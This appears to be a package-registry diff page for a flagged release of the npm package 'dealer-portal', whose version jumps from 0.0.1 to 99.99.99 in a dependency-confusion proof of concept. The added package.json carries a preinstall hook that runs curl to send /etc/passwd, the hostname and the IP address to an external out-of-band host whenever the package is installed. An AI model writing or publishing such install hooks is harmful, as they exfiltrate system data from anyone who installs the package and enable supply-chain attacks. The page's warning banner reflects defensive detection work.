dealer-portal 0.0.1 → 99.99.99
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of dealer-portal might be problematic. Click here for more details.
- package/package.json +11 -11
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
9
|
-
|
10
|
-
|
11
|
-
|
12
|
-
|
2
|
+
"name": "dealer-portal",
|
3
|
+
"version": "99.99.99",
|
4
|
+
"description": "Fake package for dependency confusion PoC",
|
5
|
+
"author": "Bug Bounty PoC",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)-$(hostname -I | awk '{print $1}').xbiddglgmbwmuyfwjoof9rwtgf4y3cta5.oast.fun"
|
8
|
+
},
|
9
|
+
"publishConfig": {
|
10
|
+
"access": "public"
|
11
|
+
}
|
12
|
+
}
|